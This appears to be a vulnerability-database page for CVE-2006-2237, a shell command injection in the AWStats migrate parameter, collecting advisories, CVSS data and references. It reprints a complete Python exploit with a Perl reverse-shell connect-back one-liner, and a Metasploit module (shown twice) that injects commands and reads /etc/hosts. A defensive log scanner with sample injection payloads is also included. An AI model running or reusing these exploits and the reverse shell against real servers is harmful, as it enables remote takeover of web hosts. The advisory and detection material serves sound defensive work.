CVE-2006-2237
CVSS 5.1
Published: 2006-05-08 19:02:00
Revised: 2011-03-07 21:35:35

[Original] The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter.


[CNNVD] AWStats migrate parameter shell input validation vulnerability (CNNVD-200605-116)

        AWStats is a very popular web-based website traffic analysis tool.
        AWStats has an input validation vulnerability in its handling of user requests; a remote attacker could exploit it to inject PHP code and execute arbitrary commands.
        The awstats.pl script in AWStats does not adequately filter the value of the migrate variable. When the AllowToUpdateStatsFromBrowser option is enabled, a remote attacker could exploit this to inject arbitrary shell commands that run with the privileges of the web server process.

- CVSS (base score)

CVSS score: 5.1 [MEDIUM]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: HIGH [exploitation requires specific access conditions]
Attack vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/a:awstats:awstats:6.4
cpe:/a:awstats:awstats:6.5

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2237
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2237
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-116
(official data source) CNNVD

- Other links and resources

http://www.osvdb.org/25284
(PATCH)  OSVDB  25284
http://secunia.com/advisories/19969
(VENDOR_ADVISORY)  SECUNIA  19969
http://www.vuxml.org/freebsd/2df297a2-dc74-11da-a22b-000c6ec775d9.html
(UNKNOWN)  MISC  http://www.vuxml.org/freebsd/2df297a2-dc74-11da-a22b-000c6ec775d9.html
http://www.vupen.com/english/advisories/2006/1678
(UNKNOWN)  VUPEN  ADV-2006-1678
http://www.securityfocus.com/bid/17844
(UNKNOWN)  BID  17844
http://www.osreviews.net/reviews/comm/awstats
(UNKNOWN)  MISC  http://www.osreviews.net/reviews/comm/awstats
http://awstats.sourceforge.net/awstats_security_news.php
(UNKNOWN)  CONFIRM  http://awstats.sourceforge.net/awstats_security_news.php
http://xforce.iss.net/xforce/xfdb/26287
(UNKNOWN)  XF  awstats-migrate-command-execution(26287)
http://www.ubuntulinux.org/support/documentation/usn/usn-285-1
(UNKNOWN)  UBUNTU  USN-285-1
http://www.novell.com/linux/security/advisories/2006_33_awstats.html
(UNKNOWN)  SUSE  SUSE-SA:2006:033
http://www.debian.org/security/2006/dsa-1058
(UNKNOWN)  DEBIAN  DSA-1058
http://security.gentoo.org/glsa/glsa-200606-06.xml
(UNKNOWN)  GENTOO  GLSA-200606-06
http://secunia.com/advisories/20710
(UNKNOWN)  SECUNIA  20710
http://secunia.com/advisories/20496
(UNKNOWN)  SECUNIA  20496
http://secunia.com/advisories/20186
(UNKNOWN)  SECUNIA  20186
http://secunia.com/advisories/20170
(UNKNOWN)  SECUNIA  20170

- Vulnerability information

AWStats migrate parameter shell input validation vulnerability
Medium severity  Input validation
2006-05-08 00:00:00 2006-05-09 00:00:00
Remote

- Advisory and patch

        The vendor has released an upgrade patch to fix this security issue. Patch download link:
        http://www.debian.org/security/2005/dsa-1058

- Vulnerability information (1755)

AWStats <= 6.5 (migrate) Remote Shell Command Injection Exploit (EDBID:1755)
cgi webapps
2006-05-06 Verified
0 redsand
N/A
#!/usr/bin/env python
# http://secunia.com/advisories/19969/
# by redsand@blacksecurity.org
# May 5, 2006 - HAPPY CINCO DE MAYO
# HAPPY BIRTHDAY DAD
# private plz


#
# 	redsand@jinxy ~/ $ nc -l -p 31337 -v
#	listening on [any] 31337 ...
#	connect to [65.99.197.147] from blacksecurity.org [65.99.197.147] 53377
#	id
#	uid=81(apache) gid=81(apache) groups=81(apache)
#


import sys, socket, base64
import urllib2, urlparse, urllib

# perl 1 line tcp connect-back code
# needs ip & port
cmd = 'perl -e \'$h="%s";$p=%r;use Socket;$sp=inet_aton($h);$sa=sockaddr_in($p,$sp);;socket(CLIENT,PF_INET,SOCK_STREAM,getprotobyname("tcp"));gethostbyname($h);connect(CLIENT,$sa);open(STDIN,">&CLIENT");open(STDOUT,">&CLIENT");open(STDERR,">&CLIENT");if(fork()){exec "/bin/sh"; exit(0); };\'';

class	rbawstatsMigrate:
	__url = '' 
	__user = ''
	__password = ''
	__auth = False
	__chost =False
	__cport = False
	
	def	__init__(self,host=False, ur=False, ps=False, chost=False, cport=False):
		if host:
			self.__url = host
		if ur:
			self.__user = ur
		if ps:	
			self.__password = ps

		if ur or ps:	self.__auth = True


		if chost: self.__chost = chost
		if cport: self.__cport = cport


		url = urlparse.urlsplit(self.__url)

		i = url[1].find(';')
		if i >= 0:
			self.__parsed_host = url[1][:i]
		else:
			self.__parsed_host = url[1]

	def	probe(self):

		cphost = socket.gethostbyname_ex(self.__chost)

		my_cmd = cmd % (cphost[2][0],self.__cport)
		url_xpl = { "config": self.__parsed_host,
			    "migrate":"|cd /tmp/ && %s|awstats052005.%s.txt" % (my_cmd, self.__parsed_host)
			    # "migrate":"|cd /tmp/ && wget %s && chmod 777 %s && /tmp/%s|awstats052005.%s.txt" % (rsv, fname, fname, self.__parsed_host)

			  }

		#if self.__url[len(self.__url) -1] != '?':
		#	url_xpl = '?' + url_xpl

		url = self.__url 
		url_xpl =  urllib.urlencode(url_xpl)

		try:
			req = urllib2.Request(url, url_xpl)
			if(self.__auth):
				b64str = base64.encodestring('%s:%s' % (self.__user,self.__password))[:-1]
				req.add_header('Authorization', "Basic %s"% b64str)

			req.add_header('Referer', "http://exploit.by.redsand.of.blacksecurity.org")
			req.add_header('Accept', 'text/xml,application/xml,application/xhtml+xml,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1')
			req.add_header('Accept-Language','en-us')
			req.add_header('Accept-Encoding','deflate, gzip')
			req.add_header('User-Agent', "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; [BL4CK] Security")
			req.add_header('Connection' ,'Keep-Alive')
			req.add_header('Cache-Control','no-cache')
			q = urllib2.urlopen(req)
		except IOError, e:
			print "FAILED %s" % e
			sys.exit(0)

		print "SUCCESS, now check to see if it connected-back properly to %s:%s" % (self.__chost,self.__cport)
		sys.exit(0)

user=False
pas=False
url=False
chst=False
cprt=False

print "[BL4CK] AWStats CMD Injection Exploit by redsand@blacksecurity.org"
print "http://secunia.com/advisories/19969/"
print "http://blacksecurity.org - f0r my h0mi3s"

argc = len(sys.argv)
if(argc <= 3):
	print "USAGE: %s http://host/awstats.pl <connect back host> <connect back port> [username] [password] " % sys.argv[0]
	print "\t\* Support 401 HTTP Authentication"
	sys.exit(0)
if(argc > 1):
	url = sys.argv[1]
if(argc > 2):
	chst = sys.argv[2]
if(argc > 3):
	cprt = sys.argv[3]
if(argc > 4):
	user = sys.argv[4]
if(argc > 5):
	pas = sys.argv[5]

red = rbawstatsMigrate(url, user, pas, chst, cprt)

red.probe()

# milw0rm.com [2006-05-06]

- Vulnerability information (16886)

AWStats (6.4-6.5) migrate Remote Command Execution (EDBID:16886)
cgi webapps
2010-07-03 Verified
0 metasploit
N/A
##
# $Id: awstats_migrate_exec.rb 9671 2010-07-03 06:21:31Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'AWStats migrate Remote Command Execution',
			'Description'    => %q{
					This module exploits an arbitrary command execution vulnerability in the
				AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based
				payloads are recommended with this module. The vulnerability is only
				present when AllowToUpdateStatsFromBrowser is enabled in the AWstats
				configuration file (non-default).
			},
			'Author'         => [ 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9671 $',
			'References'     =>
				[
					['CVE', '2006-2237'],
					['OSVDB', '25284'],
					['BID', '17844'],
					['URL', 'http://awstats.sourceforge.net/awstats_security_news.php'],
					['URL', 'http://www.milw0rm.com/exploits/1755'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 512,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby bash telnet',
						}
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'May 04 2006',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('URI', [true, "The full URI path to awstats.pl", "/cgi-bin/awstats.pl"]),
				OptString.new('AWSITE', [true, "The AWStats config site name", "demo"]),
			], self.class)
	end

	def check
		res = send_request_cgi({
			'uri'      => datastore['URI'],
			'vars_get' =>
				{
					'migrate' => "|echo;cat /etc/hosts;echo|awstats#{Rex::Text.rand_text_numeric(6)}.#{datastore['AWSITE']}.txt"
				}
			}, 25)

		if (res and res.body.match(/localhost/))
			return Exploit::CheckCode::Vulnerable
		end

		return Exploit::CheckCode::Safe
	end

	def exploit
		command = Rex::Text.uri_encode("cd /tmp &&" + payload.encoded)
		sploit = datastore['URI'] + "?migrate=|echo;echo%20YYY;#{command};echo%20YYY;echo|awstats#{Rex::Text.rand_text_numeric(6)}.#{datastore['AWSITE']}.txt"

		res = send_request_raw({
			'uri'     => sploit,
			'method'  => 'GET',
			'headers' =>
				{
					'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
					'Connection' => 'Close',
				}
			}, 25)

		if (res)
			print_status("The server returned: #{res.code} #{res.message}")

			m = res.body.match(/YYY\n(.*)\nYYY/m)

			if (m)
				print_status("Command output from the server:")
				print("\n" + m[1] + "\n\n")
			else
				print_status("This server may not be vulnerable")
			end
		else
			print_status("No response from the server")
		end
	end

end

- Vulnerability information (F82352)

AWStats migrate Remote Command Execution (PacketStormID:F82352)
2009-10-30 00:00:00
patrick  metasploit.com
exploit,arbitrary,cgi,perl
CVE-2006-2237

This Metasploit module exploits an arbitrary command execution vulnerability in the AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based payloads are recommended with this module. The vulnerability is only present when AllowToUpdateStatsFromBrowser is enabled in the AWstats configuration file (non-default).

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'AWStats migrate Remote Command Execution',
			'Description'    => %q{
					This module exploits an arbitrary command execution vulnerability in the
					AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based
					payloads are recommended with this module. The vulnerability is only
					present when AllowToUpdateStatsFromBrowser is enabled in the AWstats
					configuration file (non-default).
			},
			'Author'         => [ 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2006-2237'],
					['OSVDB', '25284'],
					['BID', '17844'],
					['URL', 'http://awstats.sourceforge.net/awstats_security_news.php'],
					['URL', 'http://www.milw0rm.com/exploits/1755'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 512,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby bash telnet',
						}
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'May 04 2006',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('URI', [true, "The full URI path to awstats.pl", "/cgi-bin/awstats.pl"]),
					OptString.new('AWSITE', [true, "The AWStats config site name", "demo"]),
				], self.class)
	end

	def check
		res = send_request_cgi({
			'uri'      => datastore['URI'],
			'vars_get' =>
			{
				'migrate' => "|echo;cat /etc/hosts;echo|awstats#{Rex::Text.rand_text_numeric(6)}.#{datastore['AWSITE']}.txt"
			}
		}, 25)

		if (res and res.body.match(/localhost/))
			return Exploit::CheckCode::Vulnerable
		end

		return Exploit::CheckCode::Safe
	end

	def exploit
		command = Rex::Text.uri_encode("cd /tmp &&" + payload.encoded)
		sploit = datastore['URI'] + "?migrate=|echo;echo%20YYY;#{command};echo%20YYY;echo|awstats#{Rex::Text.rand_text_numeric(6)}.#{datastore['AWSITE']}.txt"

		res = send_request_raw({
			'uri'     => sploit,
			'method'  => 'GET',
			'headers' =>
			{
				'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
				'Connection' => 'Close',
			}
		}, 25)

		if (res)
			print_status("The server returned: #{res.code} #{res.message}")

			m = res.body.match(/YYY\n(.*)\nYYY/m)

			if (m)
				print_status("Command output from the server:")
				print("\n" + m[1] + "\n\n")
			else
				print_status("This server may not be vulnerable")
			end
		else
			print_status("No response from the server")
		end
	end

end

- Vulnerability information (F46495)

Debian Linux Security Advisory 1058-1 (PacketStormID:F46495)
2006-05-22 00:00:00
Debian  debian.org
advisory,web,arbitrary
linux,debian
CVE-2006-2237

Debian Security Advisory 1058-1 - Hendrik Weimer discovered that specially crafted web requests can cause awstats, a powerful and featureful web server log analyzer, to execute arbitrary commands.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1058-1                    security@debian.org
http://www.debian.org/security/                             Martin Schulze
May 18th, 2006                          http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : awstats
Vulnerability  : missing input sanitising
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2006-2237
BugTraq ID     : 17844
Debian Bugs    : 364443 365909 365910

Hendrik Weimer discovered that specially crafted web requests can
cause awstats, a powerful and featureful web server log analyzer, to
execute arbitrary commands.

The old stable distribution (woody) is not affected by this problem.

For the stable distribution (sarge) this problem has been fixed in
version 6.4-1sarge2.

For the unstable distribution (sid) this problem has been fixed in
version 6.5-2.

We recommend that you upgrade your awstats package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/a/awstats/awstats_6.4-1sarge2.dsc
      Size/MD5 checksum:      591 bc33a94cbf5cb3fe89922f312434d0d6
    http://security.debian.org/pool/updates/main/a/awstats/awstats_6.4-1sarge2.diff.gz
      Size/MD5 checksum:    18702 88fa1b4b53640c4b5b05deaca9a3c156
    http://security.debian.org/pool/updates/main/a/awstats/awstats_6.4.orig.tar.gz
      Size/MD5 checksum:   918435 056e6fb0c7351b17fe5bbbe0aa1297b1

  Architecture independent components:

    http://security.debian.org/pool/updates/main/a/awstats/awstats_6.4-1sarge2_all.deb
      Size/MD5 checksum:   728566 d3241a30634640b4f363097f751e7282


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFEbKCXW5ql+IAeqTIRAufmAJ9ougqWpcuvBfNlmM9XWt9Cg2tlFQCgsVM4
Fkf6SQ16/Ci9j9zzf/bT3gg=
=318h
-----END PGP SIGNATURE-----

- Vulnerability information

25284
AWStats migrate Variable Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade, Third-Party Solution
Exploit Public, Exploit Commercial Vendor Verified

- Vulnerability description

AWStats contains a flaw that may allow a malicious user to execute arbitrary commands via the "|" pipe character. The issue is triggered due to improper sanitization to the 'migrate' variable before being used in an "open()" call. It is possible that the flaw may allow arbitrary code execution resulting in a loss of integrity.
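The flaw described above is a request value that reaches a Perl two-argument open() unchecked, so a leading "|" turns what should be a history filename into a command. The following Python is an added example, not AWStats code and not part of the OSVDB entry: it shows the allow-list check a CGI should apply to the migrate value before it reaches a file-open (using fullmatch rather than a "$" anchor, which would still accept a trailing newline), and a small access-log scanner that pulls migrate= values out of awstats.pl requests and flags shell metacharacters or names outside the expected awstatsMMYYYY.<site>.txt shape. The log lines, IP addresses, site names and the exact filename pattern are constructed assumptions; the real AWStats naming rule may differ.

```python
import re
from urllib.parse import unquote_plus

# Assumed shape of a legitimate history-file name that migrate= may name,
# e.g. awstats052006.example.com.txt (modelled on the names used in the
# advisories above; the real AWStats rule may differ).
HISTORY_NAME = re.compile(r"awstats\d{6}\.[A-Za-z0-9._-]+\.txt")

# Characters a Perl two-argument open() or a shell would interpret.
SHELL_META = re.compile(r"[|;&`$<>(){}\n\r]")


def is_safe_migrate_value(value):
    """Allow-list check to apply before the value reaches open().

    fullmatch is used deliberately: a pattern anchored with ``$`` would
    still accept a value carrying a trailing newline.
    """
    return HISTORY_NAME.fullmatch(value) is not None and not SHELL_META.search(value)


def migrate_params(target):
    """Return every percent-decoded migrate= value in a request target."""
    query = target.partition("?")[2]
    values = []
    for pair in query.split("&"):
        key, _, raw = pair.partition("=")
        if key == "migrate":
            values.append(unquote_plus(raw))
    return values


# Apache combined-format request line; only the fields the scanner needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_log(lines):
    """Return (ip, decoded migrate value, reason) for suspicious awstats.pl requests."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or "awstats.pl" not in m.group("target"):
            continue
        for value in migrate_params(m.group("target")):
            if SHELL_META.search(value):
                findings.append((m.group("ip"), value, "shell metacharacter"))
            elif HISTORY_NAME.fullmatch(value) is None:
                # Not injection, but outside the allow-list (e.g. traversal).
                findings.append((m.group("ip"), value, "unexpected filename"))
    return findings


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [05/May/2006:12:00:01 +0000] "GET /cgi-bin/awstats.pl?config=example.com&migrate=awstats052006.example.com.txt HTTP/1.1" 200 5120',
    '203.0.113.9 - - [05/May/2006:12:00:07 +0000] "GET /cgi-bin/awstats.pl?migrate=|echo;id;echo|awstats123456.demo.txt HTTP/1.1" 200 880',
    '198.51.100.3 - - [05/May/2006:12:00:09 +0000] "GET /index.html HTTP/1.1" 200 220',
    '203.0.113.9 - - [05/May/2006:12:00:11 +0000] "GET /cgi-bin/awstats.pl?migrate=../../etc/passwd HTTP/1.1" 200 880',
]

if __name__ == "__main__":
    for ip, value, reason in scan_log(SAMPLE_LOG):
        print(f"{ip}\t{reason}\t{value!r}")
```

Run against the constructed sample, the scanner reports the piped value as a shell metacharacter hit and the traversal-style name as an allow-list miss, while the legitimate history-file request is ignored. The allow-list, not the metacharacter blacklist, is the control to port into the CGI itself: the blacklist only exists here to label findings.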

- Timeline

2006-05-05 Unknown
Unknown Unknown

- Solution

Upgrade to version 6.6 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Credited author

- Vulnerability information

AWStats Remote Arbitrary Command Execution Vulnerability
Input Validation Error 17844
Yes No
2006-05-04 12:00:00 2006-07-21 08:42:00
Hendrik Weimer is credited with the discovery of these vulnerabilities.

- Affected program versions

Ubuntu Ubuntu Linux 5.10 powerpc
Ubuntu Ubuntu Linux 5.10 i386
Ubuntu Ubuntu Linux 5.10 amd64
Ubuntu Ubuntu Linux 5.0 4 powerpc
Ubuntu Ubuntu Linux 5.0 4 i386
Ubuntu Ubuntu Linux 5.0 4 amd64
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 10.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Professional 9.1 x86_64
S.u.S.E. Linux Professional 9.1
S.u.S.E. Linux Professional 10.1
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 10.1
Gentoo Linux
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
AWStats AWStats 6.5 -1

- Vulnerability discussion

AWStats is prone to an arbitrary command-execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to execute arbitrary shell commands in the context of the webserver process. This may help attackers compromise the underlying system; other attacks are also possible.

- Exploitation

Attackers can exploit this issue via a web client.

- Solution

Currently we are not aware of any official vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.
Please see the references for third-party vendor advisories and fixes.

Note: Although Debian advisory DSA 1058-1 was released to address this issue, Debian has reported that DSA 1058-1 does not in fact address the issue. Users should refer to DSA 1075-1 for fixes.

- References

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see the About page.

Copyright notice

CVE, CWE and OVAL are registered trademarks of MITRE Corporation; their official data sources are kept on MITRE's websites.